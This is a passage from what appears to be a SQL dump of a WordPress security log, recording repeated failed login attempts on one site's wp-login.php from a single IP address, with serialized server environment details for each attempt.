05:44:25'),(95795,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58683\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091747.079967;s:12:\"REQUEST_TIME\";i:1747091747;}}','43.205.255.0',1,'2025-05-13 04:45:48','2025-05-14 05:44:25'),(95796,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52979\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747092437.4402709;s:12:\"REQUEST_TIME\";i:1747092437;}}','43.205.255.0',1,'2025-05-13 04:57:20','2025-05-14 05:44:25'),(95797,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52988\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747092437.4408309;s:12:\"REQUEST_TIME\";i:1747092437;}}','43.205.255.0',1,'2025-05-13 04:57:20','2025-05-14 05:44:25'),(95798,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52987\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747092439.097367;s:12:\"REQUEST_TIME\";i:1747092439;}}','43.205.255.0',1,'2025-05-13 04:57:20','2025-05-14 05:44:25'),(95799,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52996\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747092439.0979741;s:12:\"REQUEST_TIME\";i:1747092439;}}','43.205.255.0',1,'2025-05-13 04:57:20','2025-05-14 05:44:25'),(95800,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"123\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52989\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"123\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747092440.0356059;s:12:\"REQUEST_TIME\";i:1747092440;}}','43.205.255.0',1,'2025-05-13 04:57:21','2025-05-14 05:44:25'),(95801,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62428\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093136.3085279;s:12:\"REQUEST_TIME\";i:1747093136;}}','43.205.255.0',1,'2025-05-13 05:08:58','2025-05-14 05:44:25'),(95802,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62430\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093136.309099;s:12:\"REQUEST_TIME\";i:1747093136;}}','43.205.255.0',1,'2025-05-13 05:08:58','2025-05-14 05:44:25'),(95803,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62438\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093137.9475999;s:12:\"REQUEST_TIME\";i:1747093137;}}','43.205.255.0',1,'2025-05-13 05:08:59','2025-05-14 05:44:25'),(95804,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62433\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093137.947037;s:12:\"REQUEST_TIME\";i:1747093137;}}','43.205.255.0',1,'2025-05-13 05:08:59','2025-05-14 05:44:25'),(95805,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62432\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093138.8829219;s:12:\"REQUEST_TIME\";i:1747093138;}}','43.205.255.0',1,'2025-05-13 05:09:00','2025-05-14 05:44:25'),(95806,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56484\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747093830.369411;s:12:\"REQUEST_TIME\";i:1747093830;}}','43.205.255.0',1,'2025-05-13 05:20:32','2025-05-14 